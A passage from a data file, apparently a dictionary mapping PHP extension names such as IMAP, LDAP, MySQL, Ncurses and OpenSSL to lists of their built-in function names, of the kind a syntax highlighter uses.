'imap_errors',
'imap_expunge',
'imap_fetch_overview',
'imap_fetchbody',
'imap_fetchheader',
'imap_fetchmime',
'imap_fetchstructure',
'imap_fetchtext',
'imap_gc',
'imap_get_quota',
'imap_get_quotaroot',
'imap_getacl',
'imap_getmailboxes',
'imap_getsubscribed',
'imap_header',
'imap_headerinfo',
'imap_headers',
'imap_last_error',
'imap_list',
'imap_listmailbox',
'imap_listscan',
'imap_listsubscribed',
'imap_lsub',
'imap_mail_compose',
'imap_mail_copy',
'imap_mail_move',
'imap_mail',
'imap_mailboxmsginfo',
'imap_mime_header_decode',
'imap_msgno',
'imap_num_msg',
'imap_num_recent',
'imap_open',
'imap_ping',
'imap_qprint',
'imap_rename',
'imap_renamemailbox',
'imap_reopen',
'imap_rfc822_parse_adrlist',
'imap_rfc822_parse_headers',
'imap_rfc822_write_address',
'imap_savebody',
'imap_scan',
'imap_scanmailbox',
'imap_search',
'imap_set_quota',
'imap_setacl',
'imap_setflag_full',
'imap_sort',
'imap_status',
'imap_subscribe',
'imap_thread',
'imap_timeout',
'imap_uid',
'imap_undelete',
'imap_unsubscribe',
'imap_utf7_decode',
'imap_utf7_encode',
'imap_utf8'],
'Informix': ['ifx_affected_rows',
'ifx_blobinfile_mode',
'ifx_byteasvarchar',
'ifx_close',
'ifx_connect',
'ifx_copy_blob',
'ifx_create_blob',
'ifx_create_char',
'ifx_do',
'ifx_error',
'ifx_errormsg',
'ifx_fetch_row',
'ifx_fieldproperties',
'ifx_fieldtypes',
'ifx_free_blob',
'ifx_free_char',
'ifx_free_result',
'ifx_get_blob',
'ifx_get_char',
'ifx_getsqlca',
'ifx_htmltbl_result',
'ifx_nullformat',
'ifx_num_fields',
'ifx_num_rows',
'ifx_pconnect',
'ifx_prepare',
'ifx_query',
'ifx_textasvarchar',
'ifx_update_blob',
'ifx_update_char',
'ifxus_close_slob',
'ifxus_create_slob',
'ifxus_free_slob',
'ifxus_open_slob',
'ifxus_read_slob',
'ifxus_seek_slob',
'ifxus_tell_slob',
'ifxus_write_slob'],
'Ingres': ['ingres_autocommit_state',
'ingres_autocommit',
'ingres_charset',
'ingres_close',
'ingres_commit',
'ingres_connect',
'ingres_cursor',
'ingres_errno',
'ingres_error',
'ingres_errsqlstate',
'ingres_escape_string',
'ingres_execute',
'ingres_fetch_array',
'ingres_fetch_assoc',
'ingres_fetch_object',
'ingres_fetch_proc_return',
'ingres_fetch_row',
'ingres_field_length',
'ingres_field_name',
'ingres_field_nullable',
'ingres_field_precision',
'ingres_field_scale',
'ingres_field_type',
'ingres_free_result',
'ingres_next_error',
'ingres_num_fields',
'ingres_num_rows',
'ingres_pconnect',
'ingres_prepare',
'ingres_query',
'ingres_result_seek',
'ingres_rollback',
'ingres_set_environment',
'ingres_unbuffered_query'],
'Inotify': ['inotify_add_watch',
'inotify_init',
'inotify_queue_len',
'inotify_read',
'inotify_rm_watch'],
'JSON': ['json_decode',
'json_encode',
'json_last_error_msg',
'json_last_error'],
'Java': ['java_last_exception_clear', 'java_last_exception_get'],
'Judy': ['judy_type', 'judy_version'],
'KADM5': ['kadm5_chpass_principal',
'kadm5_create_principal',
'kadm5_delete_principal',
'kadm5_destroy',
'kadm5_flush',
'kadm5_get_policies',
'kadm5_get_principal',
'kadm5_get_principals',
'kadm5_init_with_password',
'kadm5_modify_principal'],
'LDAP': ['ldap_8859_to_t61',
'ldap_add',
'ldap_bind',
'ldap_close',
'ldap_compare',
'ldap_connect',
'ldap_control_paged_result_response',
'ldap_control_paged_result',
'ldap_count_entries',
'ldap_delete',
'ldap_dn2ufn',
'ldap_err2str',
'ldap_errno',
'ldap_error',
'ldap_explode_dn',
'ldap_first_attribute',
'ldap_first_entry',
'ldap_first_reference',
'ldap_free_result',
'ldap_get_attributes',
'ldap_get_dn',
'ldap_get_entries',
'ldap_get_option',
'ldap_get_values_len',
'ldap_get_values',
'ldap_list',
'ldap_mod_add',
'ldap_mod_del',
'ldap_mod_replace',
'ldap_modify',
'ldap_next_attribute',
'ldap_next_entry',
'ldap_next_reference',
'ldap_parse_reference',
'ldap_parse_result',
'ldap_read',
'ldap_rename',
'ldap_sasl_bind',
'ldap_search',
'ldap_set_option',
'ldap_set_rebind_proc',
'ldap_sort',
'ldap_start_tls',
'ldap_t61_to_8859',
'ldap_unbind'],
'LZF': ['lzf_compress', 'lzf_decompress', 'lzf_optimized_for'],
'Libevent': ['event_add',
'event_base_free',
'event_base_loop',
'event_base_loopbreak',
'event_base_loopexit',
'event_base_new',
'event_base_priority_init',
'event_base_set',
'event_buffer_base_set',
'event_buffer_disable',
'event_buffer_enable',
'event_buffer_fd_set',
'event_buffer_free',
'event_buffer_new',
'event_buffer_priority_set',
'event_buffer_read',
'event_buffer_set_callback',
'event_buffer_timeout_set',
'event_buffer_watermark_set',
'event_buffer_write',
'event_del',
'event_free',
'event_new',
'event_set'],
'Lotus Notes': ['notes_body',
'notes_copy_db',
'notes_create_db',
'notes_create_note',
'notes_drop_db',
'notes_find_note',
'notes_header_info',
'notes_list_msgs',
'notes_mark_read',
'notes_mark_unread',
'notes_nav_create',
'notes_search',
'notes_unread',
'notes_version'],
'MCVE': ['m_checkstatus',
'm_completeauthorizations',
'm_connect',
'm_connectionerror',
'm_deletetrans',
'm_destroyconn',
'm_destroyengine',
'm_getcell',
'm_getcellbynum',
'm_getcommadelimited',
'm_getheader',
'm_initconn',
'm_initengine',
'm_iscommadelimited',
'm_maxconntimeout',
'm_monitor',
'm_numcolumns',
'm_numrows',
'm_parsecommadelimited',
'm_responsekeys',
'm_responseparam',
'm_returnstatus',
'm_setblocking',
'm_setdropfile',
'm_setip',
'm_setssl_cafile',
'm_setssl_files',
'm_setssl',
'm_settimeout',
'm_sslcert_gen_hash',
'm_transactionssent',
'm_transinqueue',
'm_transkeyval',
'm_transnew',
'm_transsend',
'm_uwait',
'm_validateidentifier',
'm_verifyconnection',
'm_verifysslcert'],
'Mail': ['ezmlm_hash', 'mail'],
'Mailparse': ['mailparse_determine_best_xfer_encoding',
'mailparse_msg_create',
'mailparse_msg_extract_part_file',
'mailparse_msg_extract_part',
'mailparse_msg_extract_whole_part_file',
'mailparse_msg_free',
'mailparse_msg_get_part_data',
'mailparse_msg_get_part',
'mailparse_msg_get_structure',
'mailparse_msg_parse_file',
'mailparse_msg_parse',
'mailparse_rfc822_parse_addresses',
'mailparse_stream_encode',
'mailparse_uudecode_all'],
'Math': ['abs',
'acos',
'acosh',
'asin',
'asinh',
'atan2',
'atan',
'atanh',
'base_convert',
'bindec',
'ceil',
'cos',
'cosh',
'decbin',
'dechex',
'decoct',
'deg2rad',
'exp',
'expm1',
'floor',
'fmod',
'getrandmax',
'hexdec',
'hypot',
'is_finite',
'is_infinite',
'is_nan',
'lcg_value',
'log10',
'log1p',
'log',
'max',
'min',
'mt_getrandmax',
'mt_rand',
'mt_srand',
'octdec',
'pi',
'pow',
'rad2deg',
'rand',
'round',
'sin',
'sinh',
'sqrt',
'srand',
'tan',
'tanh'],
'MaxDB': ['maxdb_affected_rows',
'maxdb_autocommit',
'maxdb_bind_param',
'maxdb_bind_result',
'maxdb_change_user',
'maxdb_character_set_name',
'maxdb_client_encoding',
'maxdb_close_long_data',
'maxdb_close',
'maxdb_commit',
'maxdb_connect_errno',
'maxdb_connect_error',
'maxdb_connect',
'maxdb_data_seek',
'maxdb_debug',
'maxdb_disable_reads_from_master',
'maxdb_disable_rpl_parse',
'maxdb_dump_debug_info',
'maxdb_embedded_connect',
'maxdb_enable_reads_from_master',
'maxdb_enable_rpl_parse',
'maxdb_errno',
'maxdb_error',
'maxdb_escape_string',
'maxdb_execute',
'maxdb_fetch_array',
'maxdb_fetch_assoc',
'maxdb_fetch_field_direct',
'maxdb_fetch_field',
'maxdb_fetch_fields',
'maxdb_fetch_lengths',
'maxdb_fetch_object',
'maxdb_fetch_row',
'maxdb_fetch',
'maxdb_field_count',
'maxdb_field_seek',
'maxdb_field_tell',
'maxdb_free_result',
'maxdb_get_client_info',
'maxdb_get_client_version',
'maxdb_get_host_info',
'maxdb_get_metadata',
'maxdb_get_proto_info',
'maxdb_get_server_info',
'maxdb_get_server_version',
'maxdb_info',
'maxdb_init',
'maxdb_insert_id',
'maxdb_kill',
'maxdb_master_query',
'maxdb_more_results',
'maxdb_multi_query',
'maxdb_next_result',
'maxdb_num_fields',
'maxdb_num_rows',
'maxdb_options',
'maxdb_param_count',
'maxdb_ping',
'maxdb_prepare',
'maxdb_query',
'maxdb_real_connect',
'maxdb_real_escape_string',
'maxdb_real_query',
'maxdb_report',
'maxdb_rollback',
'maxdb_rpl_parse_enabled',
'maxdb_rpl_probe',
'maxdb_rpl_query_type',
'maxdb_select_db',
'maxdb_send_long_data',
'maxdb_send_query',
'maxdb_server_end',
'maxdb_server_init',
'maxdb_set_opt',
'maxdb_sqlstate',
'maxdb_ssl_set',
'maxdb_stat',
'maxdb_stmt_affected_rows',
'maxdb_stmt_bind_param',
'maxdb_stmt_bind_result',
'maxdb_stmt_close_long_data',
'maxdb_stmt_close',
'maxdb_stmt_data_seek',
'maxdb_stmt_errno',
'maxdb_stmt_error',
'maxdb_stmt_execute',
'maxdb_stmt_fetch',
'maxdb_stmt_free_result',
'maxdb_stmt_init',
'maxdb_stmt_num_rows',
'maxdb_stmt_param_count',
'maxdb_stmt_prepare',
'maxdb_stmt_reset',
'maxdb_stmt_result_metadata',
'maxdb_stmt_send_long_data',
'maxdb_stmt_sqlstate',
'maxdb_stmt_store_result',
'maxdb_store_result',
'maxdb_thread_id',
'maxdb_thread_safe',
'maxdb_use_result',
'maxdb_warning_count'],
'Mcrypt': ['mcrypt_cbc',
'mcrypt_cfb',
'mcrypt_create_iv',
'mcrypt_decrypt',
'mcrypt_ecb',
'mcrypt_enc_get_algorithms_name',
'mcrypt_enc_get_block_size',
'mcrypt_enc_get_iv_size',
'mcrypt_enc_get_key_size',
'mcrypt_enc_get_modes_name',
'mcrypt_enc_get_supported_key_sizes',
'mcrypt_enc_is_block_algorithm_mode',
'mcrypt_enc_is_block_algorithm',
'mcrypt_enc_is_block_mode',
'mcrypt_enc_self_test',
'mcrypt_encrypt',
'mcrypt_generic_deinit',
'mcrypt_generic_end',
'mcrypt_generic_init',
'mcrypt_generic',
'mcrypt_get_block_size',
'mcrypt_get_cipher_name',
'mcrypt_get_iv_size',
'mcrypt_get_key_size',
'mcrypt_list_algorithms',
'mcrypt_list_modes',
'mcrypt_module_close',
'mcrypt_module_get_algo_block_size',
'mcrypt_module_get_algo_key_size',
'mcrypt_module_get_supported_key_sizes',
'mcrypt_module_is_block_algorithm_mode',
'mcrypt_module_is_block_algorithm',
'mcrypt_module_is_block_mode',
'mcrypt_module_open',
'mcrypt_module_self_test',
'mcrypt_ofb',
'mdecrypt_generic'],
'Memcache': ['memcache_debug'],
'Mhash': ['mhash_count',
'mhash_get_block_size',
'mhash_get_hash_name',
'mhash_keygen_s2k',
'mhash'],
'Ming': ['ming_keypress',
'ming_setcubicthreshold',
'ming_setscale',
'ming_setswfcompression',
'ming_useconstants',
'ming_useswfversion'],
'Misc.': ['connection_aborted',
'connection_status',
'connection_timeout',
'constant',
'define',
'defined',
'die',
'eval',
'exit',
'get_browser',
'__halt_compiler',
'highlight_file',
'highlight_string',
'ignore_user_abort',
'pack',
'php_check_syntax',
'php_strip_whitespace',
'show_source',
'sleep',
'sys_getloadavg',
'time_nanosleep',
'time_sleep_until',
'uniqid',
'unpack',
'usleep'],
'Mongo': ['bson_decode', 'bson_encode'],
'Msession': ['msession_connect',
'msession_count',
'msession_create',
'msession_destroy',
'msession_disconnect',
'msession_find',
'msession_get_array',
'msession_get_data',
'msession_get',
'msession_inc',
'msession_list',
'msession_listvar',
'msession_lock',
'msession_plugin',
'msession_randstr',
'msession_set_array',
'msession_set_data',
'msession_set',
'msession_timeout',
'msession_uniq',
'msession_unlock'],
'Mssql': ['mssql_bind',
'mssql_close',
'mssql_connect',
'mssql_data_seek',
'mssql_execute',
'mssql_fetch_array',
'mssql_fetch_assoc',
'mssql_fetch_batch',
'mssql_fetch_field',
'mssql_fetch_object',
'mssql_fetch_row',
'mssql_field_length',
'mssql_field_name',
'mssql_field_seek',
'mssql_field_type',
'mssql_free_result',
'mssql_free_statement',
'mssql_get_last_message',
'mssql_guid_string',
'mssql_init',
'mssql_min_error_severity',
'mssql_min_message_severity',
'mssql_next_result',
'mssql_num_fields',
'mssql_num_rows',
'mssql_pconnect',
'mssql_query',
'mssql_result',
'mssql_rows_affected',
'mssql_select_db'],
'Multibyte String': ['mb_check_encoding',
'mb_convert_case',
'mb_convert_encoding',
'mb_convert_kana',
'mb_convert_variables',
'mb_decode_mimeheader',
'mb_decode_numericentity',
'mb_detect_encoding',
'mb_detect_order',
'mb_encode_mimeheader',
'mb_encode_numericentity',
'mb_encoding_aliases',
'mb_ereg_match',
'mb_ereg_replace_callback',
'mb_ereg_replace',
'mb_ereg_search_getpos',
'mb_ereg_search_getregs',
'mb_ereg_search_init',
'mb_ereg_search_pos',
'mb_ereg_search_regs',
'mb_ereg_search_setpos',
'mb_ereg_search',
'mb_ereg',
'mb_eregi_replace',
'mb_eregi',
'mb_get_info',
'mb_http_input',
'mb_http_output',
'mb_internal_encoding',
'mb_language',
'mb_list_encodings',
'mb_output_handler',
'mb_parse_str',
'mb_preferred_mime_name',
'mb_regex_encoding',
'mb_regex_set_options',
'mb_send_mail',
'mb_split',
'mb_strcut',
'mb_strimwidth',
'mb_stripos',
'mb_stristr',
'mb_strlen',
'mb_strpos',
'mb_strrchr',
'mb_strrichr',
'mb_strripos',
'mb_strrpos',
'mb_strstr',
'mb_strtolower',
'mb_strtoupper',
'mb_strwidth',
'mb_substitute_character',
'mb_substr_count',
'mb_substr'],
'MySQL': ['mysql_affected_rows',
'mysql_client_encoding',
'mysql_close',
'mysql_connect',
'mysql_create_db',
'mysql_data_seek',
'mysql_db_name',
'mysql_db_query',
'mysql_drop_db',
'mysql_errno',
'mysql_error',
'mysql_escape_string',
'mysql_fetch_array',
'mysql_fetch_assoc',
'mysql_fetch_field',
'mysql_fetch_lengths',
'mysql_fetch_object',
'mysql_fetch_row',
'mysql_field_flags',
'mysql_field_len',
'mysql_field_name',
'mysql_field_seek',
'mysql_field_table',
'mysql_field_type',
'mysql_free_result',
'mysql_get_client_info',
'mysql_get_host_info',
'mysql_get_proto_info',
'mysql_get_server_info',
'mysql_info',
'mysql_insert_id',
'mysql_list_dbs',
'mysql_list_fields',
'mysql_list_processes',
'mysql_list_tables',
'mysql_num_fields',
'mysql_num_rows',
'mysql_pconnect',
'mysql_ping',
'mysql_query',
'mysql_real_escape_string',
'mysql_result',
'mysql_select_db',
'mysql_set_charset',
'mysql_stat',
'mysql_tablename',
'mysql_thread_id',
'mysql_unbuffered_query'],
'Mysqlnd_memcache': ['mysqlnd_memcache_get_config', 'mysqlnd_memcache_set'],
'Mysqlnd_ms': ['mysqlnd_ms_dump_servers',
'mysqlnd_ms_fabric_select_global',
'mysqlnd_ms_fabric_select_shard',
'mysqlnd_ms_get_last_gtid',
'mysqlnd_ms_get_last_used_connection',
'mysqlnd_ms_get_stats',
'mysqlnd_ms_match_wild',
'mysqlnd_ms_query_is_select',
'mysqlnd_ms_set_qos',
'mysqlnd_ms_set_user_pick_server'],
'Mysqlnd_uh': ['mysqlnd_uh_convert_to_mysqlnd',
'mysqlnd_uh_set_connection_proxy',
'mysqlnd_uh_set_statement_proxy'],
'NSAPI': ['nsapi_request_headers', 'nsapi_response_headers', 'nsapi_virtual'],
'Ncurses': ['ncurses_addch',
'ncurses_addchnstr',
'ncurses_addchstr',
'ncurses_addnstr',
'ncurses_addstr',
'ncurses_assume_default_colors',
'ncurses_attroff',
'ncurses_attron',
'ncurses_attrset',
'ncurses_baudrate',
'ncurses_beep',
'ncurses_bkgd',
'ncurses_bkgdset',
'ncurses_border',
'ncurses_bottom_panel',
'ncurses_can_change_color',
'ncurses_cbreak',
'ncurses_clear',
'ncurses_clrtobot',
'ncurses_clrtoeol',
'ncurses_color_content',
'ncurses_color_set',
'ncurses_curs_set',
'ncurses_def_prog_mode',
'ncurses_def_shell_mode',
'ncurses_define_key',
'ncurses_del_panel',
'ncurses_delay_output',
'ncurses_delch',
'ncurses_deleteln',
'ncurses_delwin',
'ncurses_doupdate',
'ncurses_echo',
'ncurses_echochar',
'ncurses_end',
'ncurses_erase',
'ncurses_erasechar',
'ncurses_filter',
'ncurses_flash',
'ncurses_flushinp',
'ncurses_getch',
'ncurses_getmaxyx',
'ncurses_getmouse',
'ncurses_getyx',
'ncurses_halfdelay',
'ncurses_has_colors',
'ncurses_has_ic',
'ncurses_has_il',
'ncurses_has_key',
'ncurses_hide_panel',
'ncurses_hline',
'ncurses_inch',
'ncurses_init_color',
'ncurses_init_pair',
'ncurses_init',
'ncurses_insch',
'ncurses_insdelln',
'ncurses_insertln',
'ncurses_insstr',
'ncurses_instr',
'ncurses_isendwin',
'ncurses_keyok',
'ncurses_keypad',
'ncurses_killchar',
'ncurses_longname',
'ncurses_meta',
'ncurses_mouse_trafo',
'ncurses_mouseinterval',
'ncurses_mousemask',
'ncurses_move_panel',
'ncurses_move',
'ncurses_mvaddch',
'ncurses_mvaddchnstr',
'ncurses_mvaddchstr',
'ncurses_mvaddnstr',
'ncurses_mvaddstr',
'ncurses_mvcur',
'ncurses_mvdelch',
'ncurses_mvgetch',
'ncurses_mvhline',
'ncurses_mvinch',
'ncurses_mvvline',
'ncurses_mvwaddstr',
'ncurses_napms',
'ncurses_new_panel',
'ncurses_newpad',
'ncurses_newwin',
'ncurses_nl',
'ncurses_nocbreak',
'ncurses_noecho',
'ncurses_nonl',
'ncurses_noqiflush',
'ncurses_noraw',
'ncurses_pair_content',
'ncurses_panel_above',
'ncurses_panel_below',
'ncurses_panel_window',
'ncurses_pnoutrefresh',
'ncurses_prefresh',
'ncurses_putp',
'ncurses_qiflush',
'ncurses_raw',
'ncurses_refresh',
'ncurses_replace_panel',
'ncurses_reset_prog_mode',
'ncurses_reset_shell_mode',
'ncurses_resetty',
'ncurses_savetty',
'ncurses_scr_dump',
'ncurses_scr_init',
'ncurses_scr_restore',
'ncurses_scr_set',
'ncurses_scrl',
'ncurses_show_panel',
'ncurses_slk_attr',
'ncurses_slk_attroff',
'ncurses_slk_attron',
'ncurses_slk_attrset',
'ncurses_slk_clear',
'ncurses_slk_color',
'ncurses_slk_init',
'ncurses_slk_noutrefresh',
'ncurses_slk_refresh',
'ncurses_slk_restore',
'ncurses_slk_set',
'ncurses_slk_touch',
'ncurses_standend',
'ncurses_standout',
'ncurses_start_color',
'ncurses_termattrs',
'ncurses_termname',
'ncurses_timeout',
'ncurses_top_panel',
'ncurses_typeahead',
'ncurses_ungetch',
'ncurses_ungetmouse',
'ncurses_update_panels',
'ncurses_use_default_colors',
'ncurses_use_env',
'ncurses_use_extended_names',
'ncurses_vidattr',
'ncurses_vline',
'ncurses_waddch',
'ncurses_waddstr',
'ncurses_wattroff',
'ncurses_wattron',
'ncurses_wattrset',
'ncurses_wborder',
'ncurses_wclear',
'ncurses_wcolor_set',
'ncurses_werase',
'ncurses_wgetch',
'ncurses_whline',
'ncurses_wmouse_trafo',
'ncurses_wmove',
'ncurses_wnoutrefresh',
'ncurses_wrefresh',
'ncurses_wstandend',
'ncurses_wstandout',
'ncurses_wvline'],
'Network': ['checkdnsrr',
'closelog',
'define_syslog_variables',
'dns_check_record',
'dns_get_mx',
'dns_get_record',
'fsockopen',
'gethostbyaddr',
'gethostbyname',
'gethostbynamel',
'gethostname',
'getmxrr',
'getprotobyname',
'getprotobynumber',
'getservbyname',
'getservbyport',
'header_register_callback',
'header_remove',
'header',
'headers_list',
'headers_sent',
'http_response_code',
'inet_ntop',
'inet_pton',
'ip2long',
'long2ip',
'openlog',
'pfsockopen',
'setcookie',
'setrawcookie',
'socket_get_status',
'socket_set_blocking',
'socket_set_timeout',
'syslog'],
'Newt': ['newt_bell',
'newt_button_bar',
'newt_button',
'newt_centered_window',
'newt_checkbox_get_value',
'newt_checkbox_set_flags',
'newt_checkbox_set_value',
'newt_checkbox_tree_add_item',
'newt_checkbox_tree_find_item',
'newt_checkbox_tree_get_current',
'newt_checkbox_tree_get_entry_value',
'newt_checkbox_tree_get_multi_selection',
'newt_checkbox_tree_get_selection',
'newt_checkbox_tree_multi',
'newt_checkbox_tree_set_current',
'newt_checkbox_tree_set_entry_value',
'newt_checkbox_tree_set_entry',
'newt_checkbox_tree_set_width',
'newt_checkbox_tree',
'newt_checkbox',
'newt_clear_key_buffer',
'newt_cls',
'newt_compact_button',
'newt_component_add_callback',
'newt_component_takes_focus',
'newt_create_grid',
'newt_cursor_off',
'newt_cursor_on',
'newt_delay',
'newt_draw_form',
'newt_draw_root_text',
'newt_entry_get_value',
'newt_entry_set_filter',
'newt_entry_set_flags',
'newt_entry_set',
'newt_entry',
'newt_finished',
'newt_form_add_component',
'newt_form_add_components',
'newt_form_add_hot_key',
'newt_form_destroy',
'newt_form_get_current',
'newt_form_run',
'newt_form_set_background',
'newt_form_set_height',
'newt_form_set_size',
'newt_form_set_timer',
'newt_form_set_width',
'newt_form_watch_fd',
'newt_form',
'newt_get_screen_size',
'newt_grid_add_components_to_form',
'newt_grid_basic_window',
'newt_grid_free',
'newt_grid_get_size',
'newt_grid_h_close_stacked',
'newt_grid_h_stacked',
'newt_grid_place',
'newt_grid_set_field',
'newt_grid_simple_window',
'newt_grid_v_close_stacked',
'newt_grid_v_stacked',
'newt_grid_wrapped_window_at',
'newt_grid_wrapped_window',
'newt_init',
'newt_label_set_text',
'newt_label',
'newt_listbox_append_entry',
'newt_listbox_clear_selection',
'newt_listbox_clear',
'newt_listbox_delete_entry',
'newt_listbox_get_current',
'newt_listbox_get_selection',
'newt_listbox_insert_entry',
'newt_listbox_item_count',
'newt_listbox_select_item',
'newt_listbox_set_current_by_key',
'newt_listbox_set_current',
'newt_listbox_set_data',
'newt_listbox_set_entry',
'newt_listbox_set_width',
'newt_listbox',
'newt_listitem_get_data',
'newt_listitem_set',
'newt_listitem',
'newt_open_window',
'newt_pop_help_line',
'newt_pop_window',
'newt_push_help_line',
'newt_radio_get_current',
'newt_radiobutton',
'newt_redraw_help_line',
'newt_reflow_text',
'newt_refresh',
'newt_resize_screen',
'newt_resume',
'newt_run_form',
'newt_scale_set',
'newt_scale',
'newt_scrollbar_set',
'newt_set_help_callback',
'newt_set_suspend_callback',
'newt_suspend',
'newt_textbox_get_num_lines',
'newt_textbox_reflowed',
'newt_textbox_set_height',
'newt_textbox_set_text',
'newt_textbox',
'newt_vertical_scrollbar',
'newt_wait_for_key',
'newt_win_choice',
'newt_win_entries',
'newt_win_menu',
'newt_win_message',
'newt_win_messagev',
'newt_win_ternary'],
'OAuth': ['oauth_get_sbs', 'oauth_urlencode'],
'OCI8': ['oci_bind_array_by_name',
'oci_bind_by_name',
'oci_cancel',
'oci_client_version',
'oci_close',
'oci_commit',
'oci_connect',
'oci_define_by_name',
'oci_error',
'oci_execute',
'oci_fetch_all',
'oci_fetch_array',
'oci_fetch_assoc',
'oci_fetch_object',
'oci_fetch_row',
'oci_fetch',
'oci_field_is_null',
'oci_field_name',
'oci_field_precision',
'oci_field_scale',
'oci_field_size',
'oci_field_type_raw',
'oci_field_type',
'oci_free_descriptor',
'oci_free_statement',
'oci_get_implicit_resultset',
'oci_internal_debug',
'oci_lob_copy',
'oci_lob_is_equal',
'oci_new_collection',
'oci_new_connect',
'oci_new_cursor',
'oci_new_descriptor',
'oci_num_fields',
'oci_num_rows',
'oci_parse',
'oci_password_change',
'oci_pconnect',
'oci_result',
'oci_rollback',
'oci_server_version',
'oci_set_action',
'oci_set_client_identifier',
'oci_set_client_info',
'oci_set_edition',
'oci_set_module_name',
'oci_set_prefetch',
'oci_statement_type'],
'ODBC': ['odbc_autocommit',
'odbc_binmode',
'odbc_close_all',
'odbc_close',
'odbc_columnprivileges',
'odbc_columns',
'odbc_commit',
'odbc_connect',
'odbc_cursor',
'odbc_data_source',
'odbc_do',
'odbc_error',
'odbc_errormsg',
'odbc_exec',
'odbc_execute',
'odbc_fetch_array',
'odbc_fetch_into',
'odbc_fetch_object',
'odbc_fetch_row',
'odbc_field_len',
'odbc_field_name',
'odbc_field_num',
'odbc_field_precision',
'odbc_field_scale',
'odbc_field_type',
'odbc_foreignkeys',
'odbc_free_result',
'odbc_gettypeinfo',
'odbc_longreadlen',
'odbc_next_result',
'odbc_num_fields',
'odbc_num_rows',
'odbc_pconnect',
'odbc_prepare',
'odbc_primarykeys',
'odbc_procedurecolumns',
'odbc_procedures',
'odbc_result_all',
'odbc_result',
'odbc_rollback',
'odbc_setoption',
'odbc_specialcolumns',
'odbc_statistics',
'odbc_tableprivileges',
'odbc_tables'],
'OPcache': ['opcache_compile_file',
'opcache_get_configuration',
'opcache_get_status',
'opcache_invalidate',
'opcache_reset'],
'Object Aggregation': ['aggregate_info',
'aggregate_methods_by_list',
'aggregate_methods_by_regexp',
'aggregate_methods',
'aggregate_properties_by_list',
'aggregate_properties_by_regexp',
'aggregate_properties',
'aggregate',
'aggregation_info',
'deaggregate'],
'OpenAL': ['openal_buffer_create',
'openal_buffer_data',
'openal_buffer_destroy',
'openal_buffer_get',
'openal_buffer_loadwav',
'openal_context_create',
'openal_context_current',
'openal_context_destroy',
'openal_context_process',
'openal_context_suspend',
'openal_device_close',
'openal_device_open',
'openal_listener_get',
'openal_listener_set',
'openal_source_create',
'openal_source_destroy',
'openal_source_get',
'openal_source_pause',
'openal_source_play',
'openal_source_rewind',
'openal_source_set',
'openal_source_stop',
'openal_stream'],
'OpenSSL': ['openssl_cipher_iv_length',
'openssl_csr_export_to_file',
'openssl_csr_export',
'openssl_csr_get_public_key',
'openssl_csr_get_subject',
'openssl_csr_new',
'openssl_csr_sign',
'openssl_decrypt',
'openssl_dh_compute_key',
'openssl_digest',
'openssl_encrypt',
'openssl_error_string',
'openssl_free_key',
'openssl_get_cipher_methods',
'openssl_get_md_methods',
'openssl_get_privatekey',
'openssl_get_publickey',
'openssl_open',
'openssl_pbkdf2',
'openssl_pkcs12_export_to_file',
'openssl_pkcs12_export',
'openssl_pkcs12_read',
'openssl_pkcs7_decrypt',
'openssl_pkcs7_encrypt',
'openssl_pkcs7_sign',
'openssl_pkcs7_verify',
'openssl_pkey_export_to_file',
'openssl_pkey_export',
'openssl_pkey_free',
'openssl_pkey_get_details',
'openssl_pkey_get_private',
'openssl_pkey_get_public',
'openssl_pkey_new',
'openssl_private_decrypt',
'openssl_private_encrypt',
'openssl_public_decrypt',
'openssl_public_encrypt',
'openssl_random_pseudo_bytes',
'openssl_seal',
'openssl_sign',
'openssl_spki_export_challenge',
'openssl_spki_export',
'openssl_spki_new',
'openssl_spki_verify',
'openssl_verify',
'openssl_x509_check_private_key',
'openssl_x509_checkpurpose',
'openssl_x509_export_to_file',
'openssl_x509_export',
'openssl_x509_free',
'openssl_x509_parse',
'openssl_x509_read'],
'Output Control': ['flush',
'ob_clean',
'ob_end_clean',
'ob_end_flush',
'ob_flush',
'ob_get_clean',
'ob_get_contents',
'ob_get_flush',
'ob_get_length',
'ob_get_level',
'ob_get_status',
'ob_gzhandler',
'ob_implicit_flush',
'ob_list_handlers',
'ob_start',
'output_add_rewrite_var',
'output_reset_rewrite_vars'],
'Ovrimos SQL': ['ovrimos_close',
'ovrimos_commit',
'ovrimos_connect',
'ovrimos_cursor',
'ovrimos_exec',
'ovrimos_execute',
'ovrimos_fetch_into',
'ovrimos_fetch_row',
'ovrimos_field_len',
'ovrimos_field_name',
'ovrimos_field_num',
'ovrimos_field_type',
'ovrimos_free_result',
'ovrimos_longreadlen',
'ovrimos_num_fields',
'ovrimos_num_rows',
'ovrimos_prepare',
'ovrimos_result_all',
'ovrimos_result',
'ovrimos_rollback'],
'PCNTL': ['pcntl_alarm',
'pcntl_errno',
'pcntl_exec',
'pcntl_fork',
'pcntl_get_last_error',
'pcntl_getpriority',
'pcntl_setpriority',
'pcntl_signal_dispatch',
'pcntl_signal',
'pcntl_sigprocmask',
'pcntl_sigtimedwait',
'pcntl_sigwaitinfo',
'pcntl_strerror',
'pcntl_wait',
'pcntl_waitpid',
'pcntl_wexitstatus',
'pcntl_wifexited',
'pcntl_wifsignaled',
'pcntl_wifstopped',
'pcntl_wstopsig',
'pcntl_wtermsig'],
'PCRE': ['preg_filter',
'preg_grep',
'preg_last_error',
'preg_match_all',
'preg_match',
'preg_quote',
'preg_replace_callback',
'preg_replace',
'preg_split'],
'PDF': ['PDF_activate_item',
'PDF_add_annotation',
'PDF_add_bookmark',
'PDF_add_launchlink',
'PDF_add_locallink',
'PDF_add_nameddest',
'PDF_add_note',
'PDF_add_outline',
'PDF_add_pdflink',
'PDF_add_table_cell',
'PDF_add_textflow',
'PDF_add_thumbnail',
'PDF_add_weblink',
'PDF_arc',
'PDF_arcn',
'PDF_attach_file',
'PDF_begin_document',
'PDF_begin_font',
'PDF_begin_glyph',
'PDF_begin_item',
'PDF_begin_layer',
'PDF_begin_page_ext',
'PDF_begin_page',
'PDF_begin_pattern',
'PDF_begin_template_ext',
'PDF_begin_template',
'PDF_circle',
'PDF_clip',
'PDF_close_image',
'PDF_close_pdi_page',
'PDF_close_pdi',
'PDF_close',
'PDF_closepath_fill_stroke',
'PDF_closepath_stroke',
'PDF_closepath',
'PDF_concat',
'PDF_continue_text',
'PDF_create_3dview',
'PDF_create_action',
'PDF_create_annotation',
'PDF_create_bookmark',
'PDF_create_field',
'PDF_create_fieldgroup',
'PDF_create_gstate',
'PDF_create_pvf',
'PDF_create_textflow',
'PDF_curveto',
'PDF_define_layer',
'PDF_delete_pvf',
'PDF_delete_table',
'PDF_delete_textflow',
'PDF_delete',
